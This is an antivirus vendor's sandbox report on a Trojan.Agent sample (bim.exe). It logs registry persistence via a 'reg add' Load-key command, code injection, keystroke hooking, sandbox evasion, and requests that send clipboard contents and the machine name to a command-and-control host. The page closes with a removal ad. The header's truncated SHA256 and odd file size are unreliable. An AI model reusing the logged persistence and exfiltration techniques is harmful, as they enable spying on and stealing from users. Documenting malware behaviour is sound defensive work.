Home » Virus List
Trojan.Agent
Risk Level 1
 
File Size : 1300776 KB
File Type : Portable Executable file Win32 EXE
File Name

bim.exe

MD5

4397902b8215f9380ab2d1cfb7d289a1

SHA1

508f6d494a73cfd7db557450a492aa5c90613e0e

SHA256

05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95e

General information:

* File name: C:\Users\Cognus\Desktop\bim.exe

Changes to registry :

* Modifies value "Load=C:\Users\Cognus\AppData\Roaming\FolderN\system.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows NT\CurrentVersion\Windows
binary data=43003A005C00550073006500720073005C0043006F0067006E00750073005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C0046006F006C006400650072004E005C00730079007300740065006D002E006500780065000000
old value "Load=0000"
* Creates value "(Default)=31" in key HKEY_CURRENT_USER\software\SandboxAutoExec
* Creates value "SandboxieRpcSs.exe=Sandboxie COM Services (RPC)" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Program Files\Sandboxie
binary data=530061006E00640062006F00780069006500200043004F004D002000530065007200760069006300650073002000280052005000430029000000
* Creates value "cmd.exe=Windows Command Processor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=570069006E0064006F0077007300200043006F006D006D0061006E0064002000500072006F0063006500730073006F0072000000
* Creates value "timeout.exe=timeout - pauses command processing" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=740069006D0065006F007500740020002D002000700061007500730065007300200063006F006D006D0061006E0064002000700072006F00630065007300730069006E0067000000
* Creates value "tasklist.exe=Lists the current running tasks" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=4C00690073007400730020007400680065002000630075007200720065006E0074002000720075006E006E0069006E00670020007400610073006B0073000000
* Creates value "find.exe=Find String (grep) Utility" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=460069006E006400200053007400720069006E006700200028006700720065007000290020005500740069006C006900740079000000
* Creates value "ap.exe=Something" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\Cognus\DefaultBox\user\current\AppData\Local\Temp
binary data=53006F006D0065007400680069006E0067000000
* Creates value "bim.exe=Video Editor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Users\Cognus\Desktop
binary data=56006900640065006F00200045006400690074006F0072000000

Changes to filesystem:

* Creates file C:\ProgramData\Browsers.txt
* Creates file (empty) C:\ProgramData\Mails.txt
* Creates file C:\Users\Cognus\AppData\Local\Temp\ap.exe
* Creates hidden folder C:\Users\Cognus\AppData\Roaming\FolderN
* Creates file C:\Users\Cognus\AppData\Roaming\FolderN\system.exe
* Creates file C:\Users\Cognus\AppData\Roaming\FolderN\system.exe.bat
* Creates file C:\Users\Cognus\AppData\Roaming\svhost.exe

Network services:

* Queries DNS "www.google.co.in".
* Queries DNS "ssl.gstatic.com".
* Queries DNS "apis.google.com".
* Queries DNS "www.gstatic.com".
* Queries DNS "id.google.co.in".
* Queries DNS "www.mysmartprice.com".
* Queries DNS "fonts.gstatic.com".
* Queries DNS "doypaxk1e2349.cloudfront.net".
* Queries DNS "034c7bb373c838e9e044-52af629139a1301948d7f711695e0783.r79.cf1.rackcdn.com".
* Queries DNS "c288724.r24.cf1.rackcdn.com".
* Queries DNS "c28655.r55.cf1.rackcdn.com".
* Queries DNS "a672c82f2734421c7062-2a7b68bd1399ab982df715c9d055b004.r0.cf1.rackcdn.com".
* Queries DNS "msp-ui-cdn.s3.amazonaws.com".
* Queries DNS "www.googletagmanager.com".
* Queries DNS "devvisualwebsiteoptimizer.com".
* Queries DNS "www.googletagservices.com".
* Queries DNS "4befd2b75084217bdb89-0db8ef8f76dda1bacd72a54e7571190e.r6.cf1.rackcdn.com".
* Queries DNS "coupons.mysmartprice.com".
* Queries DNS "c0028545.cdn1.cloudfiles.rackspacecloud.com".
* Queries DNS "www.google-analytics.com".
* Queries DNS "d1nfvnlhmjw5uh.cloudfront.net".
* Queries DNS "connect.facebook.net".
* Queries DNS "d2n45drhpt1edz.cloudfront.net".
* Queries DNS "ajax.googleapis.com".
* Queries DNS "www.facebook.com".
* Queries DNS "www.google.com".
* Queries DNS "cdn.livechatinc.com".
* Queries DNS "bs.serving-sys.com".
* Queries DNS "athena.mysmartprice.info".
* Queries DNS "b12984e4d8c82ca48867-a8f8a87b64e178f478099f5d1e26a20d.r85.cf1.rackcdn.com".
* Queries DNS "secure.livechatinc.com".
* Queries DNS "fkusimo.ru".
* Queries DNS "js-agent.newrelic.com".
* Queries DNS "bam.nr-data.net".
* Queries DNS "www.livechatinc.com".
* Queries DNS "fonts.googleapis.com".
* Queries DNS "d1gpfrwu766nab.cloudfront.net".
* Queries DNS "pagead2.googlesyndication.com".
* Queries DNS "fd379b09dfe5fd258cee-4c7efcc0fa50ed2f0ba8ecc23dd2f42d.ssl.cf1.rackcdn.com".
* Queries DNS "115b6fee8e6af24e5803-82cf6157a8169c9e50dc1c35c1fca86b.ssl.cf1.rackcdn.com".
* Queries DNS "cm.g.doubleclick.net".
* Queries DNS "googleads.g.doubleclick.net".
* Queries DNS "tpc.googlesyndication.com".
* Queries DNS "partner.googleadservices.com".
* Queries DNS "webres5.qheal.ctmail.com".
* Queries DNS "teredo.ipv6.microsoft.com".
* Queries DNS "ipaddress.com".
* Queries DNS "webres3.qheal.ctmail.com".
* Queries DNS "resolver1.qheal.ctmail.com".
* Queries DNS "resolver2.qheal.ctmail.com".
* Queries DNS "eca7be04b147deacfa4c-82cf6157a8169c9e50dc1c35c1fca86b.r11.cf1.rackcdn.com".
* Queries DNS "www.googleadservices.com".
* Queries DNS "graph.facebook.com".
* Queries DNS "0a139eea44aaa5b71501-dd7be9abd488a04eaa465c4563316f16.r46.cf1.rackcdn.com".
* Queries DNS "c223968.r68.cf1.rackcdn.com".
* Queries DNS "platform.twitter.com".
* Queries DNS "fbstatic-a.akamaihd.net".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-if-v6exp3-v4.metric.gstatic.com".
* Queries DNS "mspdeals.disqus.com".
* Queries DNS "sb.scorecardresearch.com".
* Queries DNS "staticxx.facebook.com".
* Queries DNS "webres2.qheal.ctmail.com".
* Queries DNS "webres4.qheal.ctmail.com".
* Queries DNS "disqus.com".
* Queries DNS "a.disquscdn.com".
* Queries DNS "www.snipercorporation.com".
* Queries DNS "syndication.twitter.com".
* Queries DNS "twitter.com".
* Queries DNS "glitter.services.disqus.com".
* Queries DNS "realtime.services.disqus.com".
* Queries DNS "clients1.google.com".
* Queries DNS "referrer.disqus.com".
* Queries DNS "ssl.google-analytics.com".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-193130-i2-v6exp3-v4.metric.gstatic.com".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-193130-i1-v6exp3-ds.metric.gstatic.com".
* Queries DNS "www.msftncsi.com".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-193130-s1-v6exp3-v4.metric.gstatic.com".
* Queries DNS "a.rfihub.com".
* Queries DNS "pnc-147.pnc-rtb1.rfihub.com".
* Queries DNS "p4-g6osfa34cyanu-rgdnazlrshfp4hg4-if-v6exp3-v4.metric.gstatic.com".
* Queries DNS "secure-ds.serving-sys.com".
* Queries DNS "c1.rfihub.net".
* Queries DNS "p.rfihub.com".
* Queries DNS "paytm.com".
* Queries DNS "cdnjs.cloudflare.com".
* Queries DNS "maps.googleapis.com".
* Queries DNS "shop.paytm.com".
* Queries DNS "csi.gstatic.com".
* Queries DNS "datahub.serving-sys.com".
* Queries DNS "ad.doubleclick.net".
* Queries DNS "gateway.answerscloud.com".
* Queries DNS "u.heatmap.it".
* Queries DNS "in-tags.vizury.com".
* Queries DNS "catalog.paytm.com".
* Queries DNS "themes.googleusercontent.com".
* Queries DNS "sp.analytics.yahoo.com".
* Queries DNS "stats.g.doubleclick.net".
* Queries DNS "4516565.fls.doubleclick.net".
* Queries DNS "cart.paytm.com".
* Queries DNS "assetscdn.paytm.com".
* Queries DNS "sg-pl.vizury.com".
* Queries DNS "p4-g6osfa34cyanu-rgdnazlrshfp4hg4-872661-i1-v6exp3-v4.metric.gstatic.com".
* Queries DNS "p4-g6osfa34cyanu-rgdnazlrshfp4hg4-872661-i2-v6exp3-ds.metric.gstatic.com".
* Queries DNS "eu2.heatmap.it".
* Queries DNS "scontent.webcollage.net".
* Queries DNS "d22vyp49cxb9py.cloudfront.net".
* Queries DNS "www.dsply.com".
* Queries DNS "20000.betaout.in".
* Queries DNS "cdn8.vizury.com".
* Queries DNS "s3.amazonaws.com".
* Queries DNS "resolver3.qheal.ctmail.com".
* Queries DNS "resolver5.qheal.ctmail.com".
* Queries DNS "webres1.qheal.ctmail.com".
* Queries DNS "crl.microsoft.com".
* C:\Users\Cognus\Desktop\bim.exe Connects to "83.217.27.119" on port 80 (TCP - HTTP).
* Downloads file from "fkusimo.ru /web/image/upload.php".
* Downloads file from "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=%09bim.exe&machinetime=11:52%20AM".
* Downloads file from "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:52%20AM".
* Downloads file from "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:53%20AM".
* Downloads file from "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:54%20AM".
* Downloads file from "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:55%20AM".
* Downloads file from "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:56%20AM".
* Uses POST methods in HTTP.

Process/window/string information:

* Escalates a process to system critical status.
* Gets user name information.
* Gets computer name.
* Checks for debuggers.
* Installs a hook procedure that monitors keystroke messages.
* Removes Zone.Identifier information.
* Uses a pipe for inter-process communication.
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1064".
* Enables privilege SeDebugPrivilege.
* Creates process "null, "cmd.exe", C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\cmd.exe".
* Creates process "C:\Windows\system32\reg.exe, reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\Users\Cognus\AppData\Roaming\FolderN\system.exe" /f, C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\reg.exe".
* Creates process "null, C:\Users\Cognus\AppData\Roaming\FolderN\system.exe.bat, null".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2932".
* Creates process "C:\Windows\system32\timeout.exe, timeout /t 4, C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\timeout.exe".
* Creates process "C:\Windows\system32\tasklist.exe, tasklist /nh /fi "imagename eq svhost.exe" , C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\tasklist.exe".
* Creates process "C:\Windows\system32\find.exe, find /i "svhost.exe" , C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\find.exe".
* Enumerates running processes.
* Creates process "C:\Users\Cognus\AppData\Local\Temp\ap.exe, "C:\Users\Cognus\AppData\Local\Temp\ap.exe" , null".
* Injects code into process "C:\Sandbox\Cognus\DefaultBox\user\current\AppData\Local\Temp\ap.exe".
* Opens a service named "VaultSvc".
* Starts a service.
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3752".
* Creates a mutex "Global\.net clr networking".
* Enables privilege SeAuditPrivilege.
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1384".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3924".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_4024".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2252".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2496".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_612".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3088".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2912".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3680".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1644".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2408".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3700".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1708".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_4048".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2284".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1268".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3092".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2908".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2896".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3052".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_4016".
* Enables process privileges.
* Contains string Detected Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
* Sleeps 74347 seconds.

Additional Information:

How To Remove bim.exe

1.Download Sniper Antivirus
2.Install the exe file on your system.
3.Full Scan your Computer OR Folder where bim.exe located.
4.Once the scan is finished, you’ll get the message “scan is complete”.
Click OK button to get the results.
5.Then Delete the threat from table.

Top